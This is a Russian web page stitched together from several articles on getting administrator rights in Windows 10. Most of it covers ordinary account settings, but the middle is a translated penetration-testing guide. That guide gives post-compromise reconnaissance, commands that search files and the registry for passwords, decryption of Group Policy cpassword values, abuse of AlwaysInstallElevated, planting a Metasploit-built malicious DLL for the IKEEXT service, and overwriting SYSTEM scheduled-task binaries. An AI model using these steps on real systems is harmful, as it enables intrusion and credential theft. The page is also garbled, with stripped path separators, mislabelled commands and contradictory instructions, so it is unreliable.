Как повысить уровень доступа в windows 10

Уж так получилось, что с выходом Windows 10 очень часто необходимо повышение привилегий. Ограничение прав на использование данной операционной системы связано с ее повышенной безопасностью в сфере борьбы с различными угрозами и атаками вашего компьютера.

Чтобы защитить вашу операционку и сам ПК, изначально все новоустановленные программы запускаются с ограниченными правами. Это сделано для того, чтобы программа имела ограниченный доступ к ресурсам вашего компьютера и не смогла сильно навредить в случае чего.

Однако иногда вам может понадобиться повышение привилегий в Windows, это может быть связано с:

• необходимостью изменить стандартную конфигурацию какой-либо программы;

• оптимизацией функциональности вашей операционной системы;

• необходимым доступом к каким-либо файлам;

• и другие варианты, где нужны расширенные права.

Как происходит повышение привилегий в Windows 10 

Некоторые способы повышения привилегий в Windows 10 могут не работать в «home»-версиях этой системы, так как их ограничили еще сильнее. Поэтому если у вас не будет получаться, то один из выходов — это установить «PRO» версию либо вообще перейти на Linux.

Несколько проверенных способов:

1. Универсальный способ повышения привилегий в Windows 10, 8, 7. Этот способ работает во многих версиях «Окон». Откройте «Консоль» с root-правами. Введите в окне: «net user администратор/active:yes». Если установлена англоязычная версия ОС, то вместо «администратор» нужно ввести «administrator». Готово.
2. Запустить программу с правами администратора. Если определенной программе необходимо предоставить повышение привилегий на Windows, то можно сделать следующее: наведите курсор на нужную программу. Кликайте правым кликом и найдите «Свойства». Тут вам нужен будет пункт «Запустить эту программу с правами администратора». Готово.
3. Можно в целом отключить режим одобрения администратором. Откройте Консоль на Виндовс и введите secpol.msc. Это уже встроенная в систему утилита. После ее выполнения откроется окно «Локальная политика безопасности». Слева найдите «Параметры безопасности». Кликайте и потом найдите «Учетные записи: Состояние учетной записи». Там нужно будет в состоянии «Администратор» переставить параметр на «Включен». Готово.
4. Запустите Консоль и введите там: «lusrmgr.msc». Вам откроется окно. Слева найдите Users («Пользователи») и кликайте. Вам будет предоставлен список пользователей на вашем ПК. Найдите «Администратор» и кликайте на него. Теперь нужно снять выделение с пункта «Отключить учетную запись». Сохраняйте и готово.

Повышение привилегий в Windows. Выводы

Повышение привилегий в Windows 7, 8, 10 — нетрудное мероприятие, особенно если есть хотя бы минимальные навыки работы в Консоли, ведь в основном все происходит через нее. Но нужно обязательно отдавать себе отчет в проводимых действиях, так как использование root-прав без должного внимания иногда может больше навредить вашему компьютеру, чем принести пользы. Ведь не зря же по умолчанию они отключены разработчиками «Окон».

Поэтому используйте повышение привилегий в Windows только при необходимости. И избегайте длительного использования компьютера с рут-правами, чтобы случайно не повредить системные файлы или не установить какой-нибудь вредоносный софт.

( 6 оценок, среднее 2.33 из 5 )

Время прочтения
10 мин

Просмотры 38K

Решил для себя и для тех, кому будет полезно, собрать все что знаю, но не помню по теме, в этой статье. Делитесь советами. Основным источником этой статьи является эта.

Я вольно перевел и добавил немного от себя, того, что насобирал и узнал из других источников.

В общем, тут представлены способы, которые помогут нам достигнуть цели повышения привилегий.

Отправной точкой для этой небольшой статьи является непривилегированная оболочка (учетная запись). Возможно, мы использовали эксплойт или провели атаку и получили эту оболочку.

В принципе, в начальный момент времени мы не понимаем машину: что она делает, к чему она подключена, какой уровень привилегий у нас есть или даже какая это операционная система.

Сначала нам нужно получить нужную нам информацию, чтобы понять, где мы вообще находимся и что имеем:

systeminfo | findstr /B /C:"Название ОС" /C:"Версия ОС"

Эта команда позволяет определить, как из нее видно, Название и версию ОС. Можно выполнить ее и без параметров, тогда вывод команды будет более полным, но нам достаточно и этого.

Далее важно узнать имя машины и имя пользователя, под которым мы подключились.

• hostname — имя пользователя.
• echo %username% — имя пользователя.

Далее посмотрим, какие пользователи есть еще на данном хосте и получим более подробную информацию о своем пользователе.

• net users — другие пользователи
• net user user1 — детальная информация по пользователю, где user1 — имя вашего пользователя.

Получив информацию об учетке, посмотрим информацию о сетевом взаимодействии данного хоста.

Сначала глянем на имеющиеся интерфейсы и таблицу маршрутизации.

• ipconfig /all — информация об имеющихся интерфейсах.
• route print — таблица маршрутизации
• arp -A — таблица arp записей

Далее посмотрим активные сетевые подключения и правила брандмауэра.

• netstat -ano — активные сетевые подключения.

-a — запуск с данным параметром выведет на экран все активные подключения TCP, а также порты TCP и UDP, прослушиваемые системой;
-n — параметр позволяет показать активные подключения TCP с адресами и номерами портов;
-o — так же, как и предыдущий ключ, выводит активные TCP подключения, но в статистику добавлены коды процессов, по ним уже можно точно определить, какое именно приложение использует подключение.

• netsh firewall show state — статус брандмауэра
• netsh firewall show config — конфигурация брандмауэра

Наконец, мы кратко рассмотрим, что работает на скомпрометированном хосте: запланированные задачи, запущенные процессы, запущенные службы и установленные драйверы.

schtasks /query /fo LIST /v

где
/query — Вывод данных о всех запланированных задачах,
/fo LIST — Вывод в список.
/v — Вывод подробных сведений о задании.

Следующая команда связывает запущенные процессы с запущенными службами.

tasklist /SVC

где,
/SVC — Отображение служб для каждого процесса.

Также посмотрим список запущенных служб Windows.

net start

Полезно также посмотреть информацию о драйверах скомпрометированной системы.

DRIVERQUERY

Далее хочется упомянуть о, наверное, самой полезной команде Windows — wmic. Команда WMIC (Windows Management Instrumentation Command) используется для получения сведений об оборудовании и системе, управления процессами и их компонентами, а также изменения настроек с использованием возможностей инструментария управления Windows (Windows Management Instrumentation или WMI). Хорошее описание.

К сожалению, некоторые конфигурации Windows по умолчанию не разрешают доступ к WMIC, если пользователь не входит в группу Администраторов (что действительно хорошая идея). Любая версия XP не позволяла доступ к WMIC с непривилегированной учетной записи.

Напротив, Windows 7 Professional и Windows 8 Enterprise по умолчанию позволяли пользователям с низкими привилегиями использовать WMIC.

По обычаю — параметры программы:

wmic /?

Хороший скрипт по сбору инфы через wmic.

Прежде чем идти дальше стоит пробежаться по собранной информации. Также стоит обратить внимание на установленные в системе патчи, так как любая информация о дырах в системе даст нам дополнительную опору для повышения своих привилегий. По номеру HotFix можно поискать уязвимости по повышению привилегий.

Далее мы рассмотрим автоматическую установку. Если существует необходимость установки и настройки большого парка машин, то как правило, технический персонал не будет перемещаться от машины к машине для настройки персонального каждой. Существует несколько решений для автоматической установки. Для нас не так важно, что это за методы и как они работают, а важно то, что они оставляют конфигурационные файлы, которые используются для процесса установки, содержащие много конфиденциальной информации, такой как ключ продукта операционной системы и пароль администратора. Что нас больше всего интересует, так это пароль администратора, который мы можем использовать для повышения наших привилегий.

Как правило, это следующие каталоги:

• c:sysprep.inf
• c:sysprepsysprep.xml
• %WINDIR%PantherUnattendUnattended.xml
• %WINDIR%PantherUnattended.xml

Но стоит проверить и всю систему.

Данные файлы содержат пароли в открытом виде или кодировке BASE64.
Примеры:

Sysprep.inf — пароль в открытом виде.

»

Sysprep.xml — пароль в кодировке base64.

»

Unattended.xml — пароль в кодировке base64.

Также для хостов, подключенных к домену можно поискать файл Group.xml, который содержит зашифрованный AES256 пароль, но который можно расшифровать, т.к. ключ выложен на msdn (https://msdn.microsoft.com/en-us/library/cc422924.aspx) и других источниках. Но это в случае, если используется политика создания локальных пользователей на хостах или, например, задании пароля локальному Администратору.

Например, у меня лежит тут:

Открыв его, ищем параметр “cpassword”.

Далее нужно расшифровать данную последовательность. Используем, например, CrypTool. Сначала раскодируем Base64.
Особенности Base64 в том, что его длина должна быть кратна 4. Поэтому считаем блоки по 4, и если в последнем блоке не хватает символов, то недостающие дописываем символами «=».
У меня вышло 2 «=».

Далее расшифруем. Применяя тот ключ, что выше.

Убираем лишние точки, разделяющие знаки и получаем пароль.

В дополнение к Group.xml вот несколько других файлов предпочтений политики, которые могут иметь дополнительный набор атрибутов «cPassword”:

• ServicesServices.xml
• ScheduledTasksScheduledTasks.xml
• PrintersPrinters.xml
• DrivesDrives.xml
• DataSourcesDataSources.xml

Однако мы все любим автоматизированные решения, поэтому мы можем добраться до финиша как можно быстрее. Здесь есть два основных варианта, в зависимости от типа оболочки/доступа, который у нас есть. Существует модуль metasploit, который может быть выполнен через установленную сессию (https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp) или Вы можете использовать Get-GPPPassword, который является частью PowerSploit.

Ладно, дальше. Будем искать странный параметр реестра „AlwaysInstallElevated“. Данный параметр разрешает непривилегированным пользователям устанавливать .msi файлы из-под NT AUTHORITYSYSTEM.

Для того, чтобы иметь возможность использовать это, мы должны проверить, что оба раздела реестра установлены, и если это так, мы можем получить SYSTEM shell. Проверим:

reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated

reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated

В состав Metasploit входит специальный модуль exploit/windows/local/always_install_elevated, который создает MSI-файл со встроенным в него специальным исполняемым файлом, который извлекается и выполняется установщиком с привилегиями системы. После его выполнения msi-файл прекращает установку, чтобы предотвратить регистрацию действия в системе. К тому же если запустить установку с ключом /quiet, то даже не выведется ошибка.

Ну и немного полезных команд по поиску по системе:

Команда ниже будет искать в файловой системе имена файлов, содержащие определенные ключевые слова. Вы можете указать любое количество ключевых слов.

dir /s *pass* == *cred* == *vnc* == *.config*

Поиск определенных типов файлов по ключевому слову, эта команда может генерировать много выходных данных.

findstr /si password *.xml *.ini *.txt

Аналогично две команды ниже могут быть использованы для grep реестра по ключевым словам, в данном случае „password“.

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

На данный момент у нас уже есть достаточно, чтобы получить системный шел. Но есть еще пара направленbй атаки для получения желаемого результата: мы рассмотрим службы Windows и разрешения для файлов и папок. Наша цель здесь — использовать слабые разрешения для повышения привилегий сеанса.

Мы будем проверять много прав доступа, в этом нам поможет accesschk.exe, который является инструментом от Microsoft Sysinternals Suite. Microsoft Sysinternals содержит много отличных инструментов. Пакет можно загрузить с сайта Microsoft technet (https://docs.microsoft.com/ru-ru/sysinternals/downloads/sysinternals-suite).

Мы можем проверить необходимый уровень привилегий для каждой службы с помощью accesschk.

Мы можем видеть разрешения, которые имеет каждый уровень пользователя.

Accesschk может автоматически проверять, есть ли у нас доступ на запись к службе Windows с определенным уровнем пользователя. Как правило, как пользователь с низкими привилегиями, мы хотим проверить „Пользователей“. Удостоверьтесь, что проверили, к каким группам пользователей вы принадлежите.

-c В качестве имени указана служба Windows, например ssdpsrv (укажите “*” для вывода на экран всех служб)
-d Обрабатывать только каталоги
-e Выводить только явным образом заданные уровни целостности (только для ОС Windows Vista)
-k В качестве имени указан раздел реестра, например hklmsoftware
-n Выводить только объекты, не имеющие правил доступа
-p В качестве имени указано имя или идентификатор процесса (PID), например cmd.exe (укажите в качестве имени “*”, чтобы вывести на экран все процессы)
-q Опустить заголовок
-r Выводить только объекты, к которым есть право доступа на чтение
-s Рекурсивная обработка
-v Выводить подробную информацию
-w Выводить только объекты, к которым есть право доступа на запись

Также есть еще одна интересная команда:

autorunsc.exe -a | findstr /n /R "File not found"

Позволяет найти запись в реестре о файле, который запускался автоматически, но сейчас уже отсутствует в системе. Запись могла остаться, если например, сервис был неправильно удален. При каждом запуске система безуспешно пытается запустить этот файл. Этой ситуацией также можно воспользоваться для расширения своих полномочий. Просто на место этого файла можно подставить наш.

Далее рассмотрим две уязвимости:

Первая: реплицируем результаты поста, написанного Parvez из GreyHatHacker; „Elevating privileges by exploiting weak folder permissions“ (http://www.greyhathacker.net/?p=738). 

Этот пример является частным случаем угона dll. Программы обычно не могут функционировать сами по себе, у них есть много ресурсов, которые им нужно подключить (в основном dll, но и собственные файлы). Если программа или служба загружает файл из каталога, к которому у нас есть доступ на запись, мы можем злоупотребить этим, чтобы запустить оболочку с привилегиями, под которыми работает программа.

Как правило, приложение Windows будет использовать предопределенные пути поиска, чтобы найти dll, и он будет проверять эти пути в определенном порядке. Dll угон обычно происходит путем размещения вредоносных dll по одному из этих путей. Эта проблема может быть устранена путем указания приложению абсолютных путей к необходимой dll.

Порядок поиска dll:

1. Директория с которой запущено приложение
2. 32-bit System directory (C:WindowsSystem32)
3. 16-bit System directory (C:WindowsSystem)
4. Windows directory (C:Windows)
5. Действующая рабочая директория (CWD)
6. Directories in the PATH environment variable (system then user)

Иногда приложения пытаются загрузить dll файлы, отсутствующие на машине. Это может произойти по нескольким причинам, например, если библиотека dll требуется только для определенных подключаемых модулей или компонентов, которые не установлены. В этом случае Parvez обнаружил, что некоторые службы Windows пытаются загрузить библиотеки dll, которые не существуют в установках по умолчанию.

Так как dll не существует, мы в конечном итоге прохождения всех путей поиска. Как пользователь с низким уровнем привилегий у нас немного шансов положить вредоносный dll в п. 1-4, 5. Но если у нас есть доступ на запись в любой из каталогов, то наши шансы на победу велики.

Давайте посмотрим, как это работает на практике, для нашего примера мы будем использовать IKEEXT (модули ключей IPSec IKE и AuthIP) сервис, который пытается загрузить wlbsctrl.dll.

Любой каталог в „C:“ даст доступ на запись для аутентифицированных пользователей, это дает нам шанс.

C:Usersuser1Desktop> accesschk.exe -dqv "C:Python27"

C:Python27
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTINAdministrators
        FILE_ALL_ACCESS
  RW NT AUTHORITYSYSTEM
        FILE_ALL_ACCESS
  R  BUILTINUsers
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITYAuthenticated Users
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL

C:Usersuser1Desktop> icacls "C:Python27"

C:Python27 BUILTINAdministrators:(ID)F
            BUILTINAdministrators:(OI)(CI)(IO)(ID)F
            NT AUTHORITYSYSTEM:(ID)F
            NT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F
            BUILTINUsers:(OI)(CI)(ID)R
            NT AUTHORITYAuthenticated Users:(ID)C
            NT AUTHORITYAuthenticated Users:(OI)(CI)(IO)(ID)C

F — полный доступ.
(OI) — наследование объектами.
(CI) — наследование контейнерами.
(IO) — только наследование.
(NP) — запрет на распространение наследования.
(I)- наследование разрешений от родительского контейнера.

Прежде чем перейти к действию, необходимо проверить состояние службы IKEEXT. В этом случае мы можем увидеть, что он установлен на „AUTO_START“!

sc qc IKEEXT

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IKEEXT
        TYPE			: 20  WIN32_SHARE_PROCESS
        START_TYPE		: 2   AUTO_START
        ERROR_CONTROL		: 1   NORMAL
        BINARY_PATH_NAME		: C:Windowssystem32svchost.exe -k netsvcs
        LOAD_ORDER_GROUP		:
        TAG			: 0
        DISPLAY_NAME		: IKE and AuthIP IPsec Keying Modules
        DEPENDENCIES		: BFE
        SERVICE_START_NAME	: LocalSystem

Теперь мы знаем, что у нас есть необходимые условия, и мы можем создать вредоносную dll и перехвата оболочки!

Используем Metasploit -> msfvenom, это например.

После передачи evil.dll на наш целевой компьютер все, что нам нужно сделать, это переименовать его в wlbsctrl.dll и переместить в „C:Python27“. Как только это будет сделано, нам нужно терпеливо ждать перезагрузки машины (или мы можем попытаться принудительно перезагрузить), и мы получим системную оболочку.

copy evil.dll C:Python27wlbsctrl.dll

После этого осталось только дождаться перезагрузки системы. 

Для нашего последнего примера мы рассмотрим запланированные задачи. Опишу принцип, т.к. у всех могут быть разные случаи.

Находим процесс, службу, приложение запускаемое планировщиком задач от SYSTEM.
Проверяем права доступа на папку, где находится наша цель.

accesschk.exe -dqv "путь_к_цели"

Ясно, что это серьезная проблема конфигурации, но еще хуже тот факт, что любой прошедший проверку Пользователь (аутентифицированный пользователь) имеет доступ на запись в эту папку. В этом примере мы можем просто перезаписать двоичный исполняемый файл файлом, сгенерированным в metasploit.

Можно закодировать дополнительно.

Теперь остается только загрузить вредоносный исполняемый файл и перезаписать его в папку выполняемого файла. Как только это будет сделано, мы можем спокойно идти спать и рано с утра получить системный шел.

Эти два примера должны дать нам представление об уязвимостях, которые необходимо искать при рассмотрении разрешений для файлов и папок. Потребуется время, чтобы изучить все пути binpath для служб windows, запланированные задачи и задачи автозапуска.

Напоследок пара советов по использованию accesschk.exe.

Найти все слабые разрешения для папок на диске.

accesschk.exe -uwdqs Users c:
accesschk.exe -uwdqs "Authenticated Users" c:

Найти все слабые разрешения для файлов на диске.

accesschk.exe -uwqs Users c:*.*
accesschk.exe -uwqs "Authenticated Users" c:*.*

Вроде всё.

Установите отметку напротив пункта «Отключить учетную запись».

Такими способами можно легко включить или отключить учетную запись администратора, а также добавить или снять с пользователя привилегии.

Отблагодарите автора, поделитесь статьей в социальных сетях.

Как управлять учетными записями Windows 10?

С целью повышения безопасности работы за компьютером пользователям рекомендуется создать учётную запись с ограниченными правами. Таким образом вредоносное программное обеспечение и неопытные юзеры будут ограничены в возможностях изменять системные файлы. Управление учетными записями в Windows 10 позволяет изменять уровни доступа юзеров. Рассмотрим, как это осуществляется.

Метод №1

Первым рассмотрим классический метод, которого достаточно в большинстве случаев.

2. Переключите режим отображения её иконок в «Мелкие значки».

3. Перейдите в раздел, как показано на скриншоте ниже.

4. Откройте меню управления иной учётной записью.

5. Выберите профиль, для которого нужно изменить уровень доступа (сделать администратором или же ограничить права).

6. Перейдите в окно изменения типа профиля.

7. Перенесите переключатель в нужное положение, чтобы внести изменения в системный реестр.

Метод №2

Второй способ – через Параметры системы.

1. Зажмите кнопки Win + I и перейдите в раздел для настройки пользователей.

2. Посетите подраздел «Семья, другие пользователи».

4. Укажите уровень доступа в выпадающем списке и жмите «OK».

Метод №3

Командная строка позволяет выполнить абсолютно всё, что пользователю доступно через графический интерфейс.

1. Запустите инструмент от имени Администратора при помощи контекстного меню Пуска.

2. Для активации невидимого пользователя с расширенными привилегиями выполните команду « net user administrator /active:yes ». При появлении ошибки повторите её, написав слово «administrator» на русском языке.

Метод №4

Задействуем возможности редактора групповой политики (в Home редакции Windows 10 инструмент недоступен).

2. Перейдите в «Параметры безопасности» в подразделе локальных политик.

3. Откройте свойства параметра «Состояние учётной записи…».

4. Перенесите переключатель в положение «Включён» и закройте окно с сохранением изменений.

Как и в предыдущем способе, появится новый аккаунт с расширенными привилегиями.

Метод №5

Воспользуемся инструментом «Локальные пользователи и группы».

1. В окне «Выполнить» осуществите команду « lusrmgr.msc ».

2. Перейдите в каталог «Пользователи».

3. Выберите «Администратор» и откройте его свойства.

4. Отметьте флажком «Отключить…» и кликните «OK».

Метод №6

Последний вариант решения проблемы – утилита netplwiz.

1. Жмите Win + R и выполните в окне команду «netplwiz.exe».

2. Выберите аккаунт и откройте его свойства.

3. Во вкладке «Членство в группах» укажите уровень доступа для аккаунта.

Вот так просто в Windows 10 управлять уровнем доступа юзеров без посторонних утилит.

Как шестью способами получить права администратора в Windows 10

Выпущенная недавно новая операционная система Windows 10 обладает повышенной защитой, которая обеспечивает безопасность ОС и устраняет множество угроз. Чтобы максимально защитить систему, разработчики отключили расширенные права, благодаря которым стороннее программное обеспечение имеет больше доступа к ресурсам системы. Например, самостоятельно скомпилированная программа для чтения какой-нибудь базы данных, не подписанная никаким сертификатом, будет запускаться с ограниченными правами доступа. Чтобы включить полный доступ в учетной записи администратора системы мы опишем различные способы, при которых админ получает расширенные права для управления системой.

Первый способ получения расширенного доступа админа

Первый способ получения прав администратора довольно прост. Первым делом вам необходимо зайти Windows 10 с учетной записью, которая обладает правами администратора.

Попробуем запустить программу WordPad, встроенную в операционную систему с расширенными правами. Для этого с помощью клавиатурной комбинации Win + Q перейдем к поиску Windows 10 и наберем в нем фразу «WordPad».

Теперь кликнем на полученном результате правой кнопкой мыши. В открывшемся контекстном меню найдем пункт «Запустить от имени администратора». Выполнив этот пункт, мы запустим программу WordPad в расширенном режиме админа.

Похожим образом приложение можно запустить через меню «Пуск» во вкладке «Все приложения» и выполнить запуск через контекстное меню, как это показано на изображении ниже.

Если вы хотите запустить программу с расширенными полномочиями, которая находится на Рабочем столе, то смело переходите в контекстное меню ярлыка и выбирайте пункт, отвечающий за запуск от имени админа.

Также если перейти в Свойства ярлыка и нажать кнопку «Дополнительно», вы сможете выставить автоматический запуск утилит с правами админа. Например, на изображении ниже показан пример настройки текстового редактора для программистов Notepad++.

Еще одним способом запуска утилиты WordPad с повышенными привилегиями является его запуск в командной строке с правами админа. Для этого запустим консоль таким образом — нажмем на значке «Пуск» правой кнопкой мыши и выберем пункт, который отвечает за запуск с правами админа. Теперь выполним в консоли команду write После этого наш текстовый редактор запустится с повышенными правами.

Второй способ получения расширенного режима админа

Для второго способа нам также понадобится командная строка, которая запущена с правами администратора. Также заходим в учетную запись, которая обладает правами админа. Потом переходим к поиску Windows 10 и набираем в нем фразу «CMD», которая отвечает за поиск консоли.

Кликнем кнопкой по найденному результату и выберем пункт, который запустит нашу консоль с расширенными правами. В запущенной консоли выполните команду, изображенную ниже.

Выполнив эту команду, вы наделите свою учетную запись расширенными правами и сможете запускать утилиты без каких-либо ограничений. Выполнить обратную операцию в консоли и вернуть все изменения можно, изменив слово «Yes» на «No».

Третий способ получения расширенного доступа админа

В этом способе также запустим консоль с правами админа и выполним в ней команду, изображенную ниже.

После выполнения этой команды запустится надстройка системы «Локальная политика безопасности». Еще эту надстройку можно включить в Панели управления, если вам не нравится использовать консоль.

В открытой надстройке переходим по таким ссылкам: «Локальные политики / Параметры безопасности / Учётные записи: Состояние учетной записи ‘Администратор’» и ставим в открывшемся параметре переключатель в положение «Включить».

Выполнив эти действия, вы сможете стать пользователем с полными правами доступа в системе.

Четвертый способ получения расширенного доступа админа

Запустим таким же способом, как в первом примере консоль и выполним в ней команду lusrmgr.msc

Эта команда запустит надстройку, которая позволяет управлять пользователями операционной системы Windows 10. Надстройку также можно найти и включить в Панели управления.

В открытой надстройке найдите раздел «Пользователи» и найдите в нем пользователя «Администратор». Открыв этого пользователя, отметьте пункт «Отключить учетную запись» как показано на изображении ниже.

Теперь перезагрузите ПК и войдите в систему под пользователем, для которого мы выполняли эти действия.

Проделав эти операции, вы сможете стать пользователем с полными правами доступа в системе как в предыдущем примере.

Пятый способ, позволяющий стать админом с расширенными правами

Запустим в пятый раз командную строку с правами админа и выполним в ней такую команду control userpasswords2

Также эту команду можно выполнить в программе, которая запускается комбинацией клавиш Win + R .

Эта команда позволит нам запустить окно, в котором можно управлять параметрами пользователей. Окно откроется на первой вкладке «Пользователи». Для выполнения поставленной задачи, нам необходимо перейти на вкладку «Дополнительно».

На этой вкладке нажмем кнопку Дополнительно , которая перебросит нас в знакомую нам надстройку из предыдущего примера. Поэтому выполняем все действия как в предыдущем примере.

Шестой способ получения расширенного доступа админа

В шестом способе мы опишем запуск программ с расширенными привилегиями из-под обычного пользователя. Поэтому мы перейдем в учетную запись пользователя, который обладает обычными правами. Дальнейшим нашим шагом будет запуск программы Notepad++ через контекстное меню ярлыка на Рабочем столе. Такой способ запуска описан в первом примере. Если мы запустим Notepad++ этим методом, то ОС запросит у нас пароль одного из администраторов системы.

Поэтому введем необходимый пароль и запустим Notepad++ с расширенными привилегиями.

Как видно из примера, мы запустили текстовый редактор Notepad++ из-под обычной учетки. Единственное, что стоит учитывать в этом примере, без пароля админа вы не сможете воспользоваться этим методом.

Подводим итог

Из примеров видно, что запустить приложение с повышенными привилегиями и сделать себя админом с расширенными возможностями совсем нетрудно. Но перед тем как давать своей учетке расширенные привилегии, стоит учитывать фактор безопасности.

Посудите сами, ведь неспроста разработчики Windows 10 ограничили возможности учетной записи администратора. Главным фактором такого ограничения является исполнение вредоносного кода в десятке, который может повредить системные файлы операционной системы. Поэтому будьте предельно осторожны, когда пытаетесь стать админом с повышенными правами.

А мы в свою очередь надеемся, что наш материал поможет дать нашим читателям ответ на мучащий их вопрос — как получить права администратора в Windows 10 и позволит решить множество задач.

Видео по теме

Как сделать пользователя администратором в Windows 10

По умолчанию, учетная запись первого созданного пользователя в Windows 10 (например, при установке) имеет права администратора, однако последующие создаваемые учетные записи — права обычного пользователя.

В этой инструкции для начинающих пошагово о том, как дать права администратора создаваемым пользователям несколькими способами, а также о том, как стать администратором Windows 10, если у вас нет доступа к администраторской учетной записи, плюс видео, где весь процесс показан наглядно. См. также: Как создать пользователя Windows 10, Встроенная учетная запись Администратор в Windows 10.

Как включить права администратора для пользователя в параметрах Windows 10

В Windows 10 появился новый интерфейс для управления учетными записями пользователей — в соответствующем разделе «Параметров».

Чтобы сделать пользователя администратором в параметрах достаточно выполнить следующие простые шаги (эти действия должны выполняться из учетной записи, которая уже имеет права администратора)

1. Зайдите в Параметры (клавиши Win+I) — Учетные записи — Семья и другие люди.
2. В разделе «Другие люди» нажмите по учетной записи пользователя, которого требуется сделать администратором и нажмите кнопку «Изменить тип учетной записи».
3. В следующем окне в поле «Тип учетной записи» выберите «Администратор» и нажмите «Ок».

Готово, теперь пользователь при следующем входе в систему будет иметь необходимые права.

С использованием панели управления

Чтобы изменить права учетной записи с простого пользователя на администратора в панели управления выполните следующие шаги:

1. Откройте панель управления (для этого можно использовать поиск в панели задач).
2. Откройте пункт «Учетные записи пользователей».
3. Нажмите «Управление другой учетной записью».
4. Выберите пользователя, права которого нужно изменить и нажмите «Изменение типа учетной записи».
5. Выберите «Администратор» и нажмите кнопку «Изменение типа учетной записи».

Готово, теперь пользователь является администратором Windows 10.

С помощью утилиты «Локальные пользователи и группы»

Ещё один способ сделать пользователя администратором — использовать встроенное средство «Локальные пользователи и группы»:

1. Нажмите клавиши Win+R на клавиатуре, введите lusrmgr.msc и нажмите Enter.
2. В открывшемся окне откройте папку «Пользователи», затем дважды кликните по пользователю, которого требуется сделать администратором.
3. На вкладке «Членство в группах» нажмите «Добавить».
4. Введите «Администраторы» (без кавычек) и нажмите «Ок».
5. В списке групп выберите «Пользователи» и нажмите «Удалить».
6. Нажмите «Ок».

При следующем входе в систему пользователь, который был добавлен в группу «Администраторы», будет иметь соответствующие права в Windows 10.

Как сделать пользователя администратором с помощью командной строки

Существует и способ дать права администратора пользователю используя командную строку. Порядок действий будет следующим.

1. Запустите командную строку от имени Администратора (см. Как запустить командную строку в Windows 10).
2. Введите команду net users и нажмите Enter. В результате вы увидите список учетных записей пользователей и системные учетные записи. Запомните точное имя учетной записи, права которой нужно изменить.
3. Введите команду net localgroup Администраторы имя_пользователя /add и нажмите Enter.
4. Введите команду net localgroup Пользователи имя_пользователя /delete и нажмите Enter.
5. Пользователь будет добавлен в список администраторов системы и удален из списка обычных пользователей.

Примечания по команде: на некоторых системах, созданных на базе англоязычных версий Windows 10 следует использовать «Administrators» вместо «Администраторы» и «Users» вместо «Пользователи». Также, если имя пользователя состоит из нескольких слов, возьмите его в кавычки.

Как сделать своего пользователя администратором, не имея доступа к учетным записям с правами администратора

Ну и последний возможный сценарий: вы хотите дать себе права администратора, при этом отсутствует доступ к уже имеющейся учетной записи с этими правами, из-под которой можно было бы выполнить описанные выше действия.

Даже в этой ситуации существуют некоторые возможности. Один из самых простых подходов будет таким:

1. Используйте первые шаги в инструкции Как сбросить пароль Windows 10 до того момента, как будет запущена командная строка на экране блокировки (она как раз открывается с нужными правами), сбрасывать какой-либо пароль не потребуется.
2. Используйте в этой командной строке способ «с помощью командной строки», описанный выше, чтобы сделать себя администратором.

Видео инструкция

На этом завершаю инструкцию, уверен, что у вас всё получится. Если же остаются вопросы — задавайте в комментариях, а я постараюсь ответить.

Для корректной работы некоторых приложений, а также изменения системных настроек, пользователю могут понадобиться права администратора. В нашей инструкции мы детально рассмотрим, как преобразовать простой профиль в административный в Windows 10, а также несколько способов запуска программ с повышенным уровнем доступа. 

Созданный при инсталляции десятой версии Windows аккаунт по умолчанию получает права администратора, однако впоследствии новым профилям выдаются права обычного пользователя. Присвоить администраторские привилегии аккаунту можно несколькими способами. Рассмотрим каждый из них в подробностях.

Параметры системы

У OC Windows 10 имеется собственный интерфейс управления пользователями, который находится в параметрах системы. Чтобы дать права администратора, нам понадобится проделать несколько простых операций, выполнять которые можно только войдя в систему с административными привилегиями. 

1. Открываем «Параметры» из стартового меню или нажав на клавиатуре «Win+I».
2. Выбираем раздел «Учетные записи».
3. В нем нажимаем на пункт «Семья и другие пользователи».
4. Находим профиль, которому нужно дать административный доступ, и кликаем «Изменить тип учетной записи».
5. Из списка выбираем вариант «Администратор» и жмем «ОК».

Теперь, когда этот пользователь войдет в систему Windows 10, у него появятся административные привилегии.  

Используем панель управления

Чтобы сменить тип аккаунта и дать права, можно воспользоваться соответствующим пунктом в панели управления. Для этого сделаем следующее:

1. Открываем поисковую строку и вводим запрос — панель управления 
2. Запускаем её из поисковых результатов.
3. Далее находим раздел «Учетные записи пользователей».
4. После этого воспользуемся пунктом «Управление другой учетной записью».
5. Выбираем профиль для предоставления административного доступа.
6. Нажимаем «Изменение типа учетной записи».
7. После этого выбираем вариант «Администратор». 
8. Нажимаем «Изменение типа учетной записи».

Готово, теперь выбранному профилю присвоены административные привилегии.

Настройки групповых параметров

Ещё одним способом присвоить права администратора в Windows 10 является встроенное в систему средство управления группами. Нам понадобится проделать следующее: 

1. Вызываем диалоговое окно «Выполнить», нажав клавиатурную комбинацию «Win+R».
2. Далее вводим lusrmgr.msc и нажимаем «ОК».
3. В появившемся окне переходим в каталог пользователей.
4. Здесь дважды кликаем по имени профиля, который нужно сделать администратором.
5. После этого открываем вкладку «Членство в группах».
6. Нажимаем по кнопке «Добавить».
7. Далее в соответствующее поле вписываем слово Администраторы и жмем «ОК».
8. Из списка групп выбираем «Пользователи» и кликаем «Удалить».

Теперь выбранный пользователь получит административный доступ. 

Получение прав при помощи специальных команд

Еще один вариант получения администраторских прав в Windows 10 – это с использованием командной строки. Нам потребуется осуществить следующие операции:

1. Запускаем поиск и вписываем в строку cmd.
2. Из результатов кликаем по программе правой кнопкой и используем вариант запуска с привилегиями администратора.
3. В новом окне вводим команду net users и нажимаем «Enter». 
4. На экране отобразятся все аккаунты пользователей.
